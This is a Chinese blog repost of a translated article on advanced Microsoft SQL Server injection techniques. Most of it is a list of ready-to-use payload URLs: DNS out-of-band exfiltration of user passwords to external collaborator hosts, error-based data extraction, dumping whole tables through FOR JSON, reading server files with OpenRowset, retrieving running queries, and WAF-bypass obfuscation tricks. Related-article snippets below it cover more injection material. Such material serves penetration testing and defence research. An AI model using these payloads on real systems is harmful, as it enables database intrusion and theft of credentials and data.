高级MSSQL注入技巧

最新推荐文章于 2022-02-28 16:25:07 发布
最新推荐文章于 2022-02-28 16:25:07 发布
阅读量435 收藏
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Appleteachers/article/details/115527415
版权
  1. 注入技巧

原文地址: https://reconshell.com/advanced-mssql-injection-tricks/

在本文中,我们总结了多种用于改进利用MSSQL注入漏洞的高级技术。对于文中介绍的技术,都已经在微软SQL Server的下列三个最新版本上进行了相应的测试,这些版本包括:2019、2017与2016SP2版本。

基于DNS的带外注入

对于禁用堆栈查询的、完全“盲打”型的SQL注入漏洞,可以通过函数fn_xe_file_target_read_file、fn_get_audit_file和fn_trace_gettable来实现DNS带外(out-of-band,OOB)数据泄露。

下面是基于fn_xe_file_target_read_file()函数的示例:

https://vuln.app/getItem?id= 1+and+exists(select++from+fn_xe_file_target_read_file('C:.xel’,’’%2b(select+pass+from+users+where+id=1)%2b’.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem’,null,null))

1.png

所需权限:需要具备服务器的VIEW SERVER STATE权限。

基于fn_get_audit_file()函数的示例:

https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_audit_file(’’%2b(select+pass+from+users+where+id=1)%2b’.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net’,default,default)))

1.png

所需权限:需要具有CONTROL SERVER权限。

基于fn_trace_gettable()函数的示例:

https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable(’’%2b(select+pass+from+users+where+id=1)%2b’.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net\1.trc’,default))

1.png

所需权限:需要具有CONTROL SERVER权限。

基于错误消息的注入方法

基于错误的SQL注入通常类似于«+AND+1=@@version–»这样的表达式,以及基于«OR»操作符的变体。实际上,包含这种表达式的查询通常会被WAF拦截。为了绕过WAF,可以使用%2b字符将一个字符串与特定函数调用的结果连接起来,这样的话,这些函数调用就会触发一个数据类型转换错误。这些类型的函数包括:

SUSER_NAME()
USER_NAME()
PERMISSIONS()
DB_NAME()
FILE_NAME()
TYPE_NAME()
COL_NAME()

下面是函数USER_NAME()的用法示例:

https://vuln.app/getItem?id=1’%2buser_name(@@version)–
1.png
快捷的注入方法:在一次查询中检索整个表

有两种简单的方法可以在一次查询中检索一个表的全部内容:使用FOR XML或FOR JSON子句。由于使用FOR XML子句时需要指定模式,如?raw?,所以,在简单易用方面,FOR JSON子句比它要更胜一筹。

下面的查询用于检索当前数据库中的模式、表和列:

https://vuln.app/getItem?id=-1’+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto–

1.png

需要注意的是,基于错误的注入方法需要一个别名或名称,因为没有名称的表达式的输出无法被格式化为JSON。

https://vuln.app/getItem?id=1’+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)–

1.png

https://vuln.app/getItem?id=-1+union+select+null,(select+x+from+OpenRowset(BULK+’C:\Windows\win.ini’,SINGLE_CLOB)+R(x)),null,null

1.png

基于错误的注入方法:

https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+‘C:\Windows\win.ini’,SINGLE_CLOB)+R(x))–

所需权限:BULK选项需要ADMINISTER BULK OPERATIONS或ADMINISTER DATABASE BULK OPERATIONS权限。

检索当前查询

攻击者可以通过访问sys.dm_exec_requests和sys.dm_exec_sql_text来检索正在执行的当前SQL查询:

https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null

1.png
所需权限:如果用户对服务器具有VIEW SERVER STATE权限,那么该用户将能看到SQL SERVER实例上所有正在执行的会话;否则,用户就只能看到当前会话。

绕过WAF的小技巧

非标准空格字符:%C2%85 или %C2%A0:

https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null–

利用科学(0e)和十六进制(0x)表示法对UNION进行混淆处理:

https://vuln.app/getItem?id=0eunion+select+null,@@version,null–

https://vuln.app/getItem?id=0xunion+select+null,@@version,null–

在From和列名之间使用句点而非空格:

https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users–

在SELECT和一次性列之间使用\N分隔符:

https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users–

你永远不了解Thrash的魅力
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
个人MSSQL总结及收集
qq_36334672的博客
02-05 1040
*Sysobjects表: **SQL-SERVER的每个数据库内都有此系统表,它存放该数据库内创建的所有对象,如约束、 默认值、日志、规则、存储过程等,每个对象在表中占一行。**Name, id, xtype, uid, status: **分别是对象名,对象ID,对象类型,所有者对象的用户ID,对象状态。
SQL注入攻击实战演练
Appleteachers的博客
04-20 876
今天要介绍的是SQL注入实验。SQL注入攻击的学习,我们更多的目的是为了学习攻击技术和防范策略,而不是刻意去攻击数据库。 首先我们先进入实验地址《SQL 注入》。 SQL注入是一种代码注入技术,过去常常用于攻击数据驱动性的应用,实质就是将恶意的SQL代码注入到特定字段用于实施拖库攻击等。SQL注入的成功必须借助应用程序的安全漏洞,例如用户输入没有经过正确地过滤(针对某些特定字符串)或者没有特别强调类型的时候,都容易造成异常地执行SQL语句。SQL注入是网站渗透中最常用的攻击技术,但是其实SQL注入可以用来攻
MSSQL数据库注入全方位利用
weixin_42508548的博客
11-24 657
在渗透测试过程中遇到了MSSQL数据库,市面上也有一些文章,不过大多数讲述的都是如何快速利用注入漏洞getshell的,对于MSSQL数据库的注入漏洞没有很详细地描述。在这里我查阅了很多资料,希望在渗透测试过程中遇到了MSSQL数据库能够相对友好地进行渗透测试,文章针对实战性教学,在概念描述方面有不懂的还请自行百度,谢谢大家~ 0x02 注入前准备 1、确定注入点 http://219.153.49.228:40574/new_list.asp?id=2 and 1=1
SQL注入总结(一)
guanjian_ci的博客
02-19 524
第一部分:常规注入(数据有回显前端) 第一步:测试数据类型 1.数字型 id=1 and 1=1 页面正常 id=1 and 1=2 页面不正常 2.字符型 id=1‘ and ’1‘=’1 页面正常 id=1‘ and ’1‘=’2 页面不正常 3.睡眠判断(数据不回显前端时使用) id=1' and sleep(10)--+ 页面缓冲10秒说明判断正确 4.开发常用接受参数的类型 数字型: id=$id 字符型: ...
吴袖珍的高级MSSQL注入技巧
jklbnm12的博客
07-26 794
tl;dr 本文列举了几种改进的MSSQL注入技巧,所有的攻击向量都至少在三个最新版本的Microsoft SQL Server上进行了测试:2019、2017、2016SP2。 DNS Out-of-Band 如果遇到带有禁用堆栈查询的完全盲SQL注入,则可以通过函数 fn_xe_file_target_read_file, fn_get_audit_file,和fn_trace_gettable实现DNS带外(OOB)数据泄露。 利用fn_xe_file_target_read_file()的例子: h
高级的MSSQL注入技巧
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-30 459
tl;dr 本文列举了几种改进的MSSQL注入技巧,所有的攻击向量都至少在三个最新版本的Microsoft SQL Server上进行了测试:2019、2017、2016SP2。 DNS Out-of-Band 如果遇到带有禁用堆栈查询的完全盲SQL注入,则可以通过函数 fn_xe_file_target_read_file, fn_get_audit_file,和fn_trace_gettable实现DNS带外(OOB)数据泄露。 利用fn_xe_file_target_read_file()的例子
MSsql高级注入笔记.txt
07-18
#### 三、MSsql注入技巧详解 接下来,我们将详细介绍一些MSsql中的高级注入技巧: 1. **基本SQL查询构造**: - `select * from sysobjects`:列出数据库中的所有对象。 - `select * from sysindexes`:获取索引...
mssql高手注入.txt
07-18
### 利用SQL注入技巧 #### 1. 利用“IN”子句进行SQL注入 在MSSQL中,“IN”子句可以用来指定多个值作为查询条件的一部分。例如:“SELECT * FROM mytable WHERE id IN (1)”。攻击者可以通过修改输入参数为:...
84.网络安全渗透测试—[SQL注入篇23]—[高级注入技巧-dnslog无回显注入]
qwsn
01-21 4355
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、高级注入技巧 dnslog无回显注入 1、原理 2、dnslog平台 3、MySQL dnslog无回显注入示例: 4、SQLSERVER dnslog无回显注入示例: 5、总结:
高级SQL注入课程.pdf
01-25
### 高级SQL注入课程知识点概述 #### 一、SQL注入简介 - **定义**: SQL注入是一种常见的Web安全漏洞,攻击者通过将恶意SQL代码插入应用程序接收的数据中,以达到控制或操纵数据库的目的。这种攻击通常发生在应用...
sql活动监视器 死锁_使用system_health扩展事件监视SQL Server死锁
culuo4781的博客
07-20 839
sql活动监视器 死锁 Performance monitoring is a must to do the task for a DBA. You should ensure that the database performance is optimal all the time without any impact on the databases. Performance issue...
Mssql注入——dns注入,反弹注入
weixin_46601374的博客
02-28 2804
DNS注入 DNS注入原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 load_file函数的作用 用于读取文件内容,并返回输出 load_file函数是什么 load_file 读取文件函数,读取的内容返回为字符串输出。 load_file函数在注入的作用 利用读取注入的报错信息,然后返回报错信息(显
MSSQL注入
秋水的博客
09-04 9087
MSSQL数据库 数据库简介 MSSQL是指微软的SQLServer数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库。属关系型数据库 注入简介 MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖的攻击思路 ...
绕过MSSQL防注入的一些解决办法
eldn__的专栏
11-20 2983
绕过MSSQL防注入的一些解决办法 在工作中还是其他时候都时常遇见一些网站加了防注入代码,这确实让人头痛不已,不过另一个方面让我终于又有了一个新的可以深入琢磨的课题,同时也看见了前辈们提供的很多绕过防注入方法,都着实让我受益匪浅。把思路集中一下,具有列出以下的几点: 1.编码处理 2.语句变换 3.其他 对这几点还是做一些简要的说明吧! 编码处理-> 关于编码问题
SQL注入之Mssql注入
qq_57307348的博客
02-16 5474
sql注入之mssql注入基础
MSSQL·查询T-SQL执行记录
SCscHero的博客
05-30 755
阅文时长 | 0.78分钟 字数统计 | 1261.6字符 主要内容 | 1、引言&背景 2、查询最近的T-SQL执行记录 3、查询实际执行过的事务日志 4、声明与参考资料 『MSSQL·查询T-SQL执行记录』 编写人 | SCscHero 编写时间 | 2021/5/30 PM2:18 文章类型 | 系列 完成度 | 已完成 座右铭 每一个伟大的事业,都有一个微不足道的开始。 一、引言&背景  &n..
MSSQL数据库注入(一)
hhhshd的博客
11-17 5406
1. MSSQL注入手工联合注入 mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql中使用的函数在mssql中有些会起不到作用点。 (例如:在mssql中只能用top 取代limt 0,N,row_number() over()函数取代limit N,M) mssql在使用上和可移植等方面与mysql存在不同的差异。 MSSQL数据库的基本知识 MSSQL中自带数据库信息 库名 相关功能 master 系统控制数据库,包含配置信
mysql带外攻击_mysql 带外注入
weixin_39710966的博客
01-19 233
带外通道有时候注入发现并没有回显,也不能利用时间盲注,那么就可以利用带外通道,也就是利用其他协议或者渠道,如http请求、DNS解析、SMB服务等将数据带出。payloadSELECT LOAD_FILE(CONCAT(‘\\\\‘,( SELECT DATABASE() ),‘.xx.xx\\x));其中的load_file的地址为一个远程文件,mysql在load_file()一个远程文件时会...
MSSQL查询当前正在执行的SQL语句
wangqi791975的博客
04-16 3193
SET TRANSACTION ISOLATION LEVEL READ UNCOMMITTED SELECT [Spid] = session_id , ecid , [Database] = DB_NAME(sp.dbid) , [User] = nt_username , [Status] = er.status , ...
深入理解SQL注入:攻击、防御与工具解析
课程内容详细讲解了不同数据库系统的SQL注入技巧,如Access、Mssql、MySQL、Oracle和Postgresql。此外,还会介绍一些常用的SQL注入工具,帮助学员理解如何在实际环境中发现和利用注入漏洞。课程的重点之一是SQL注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值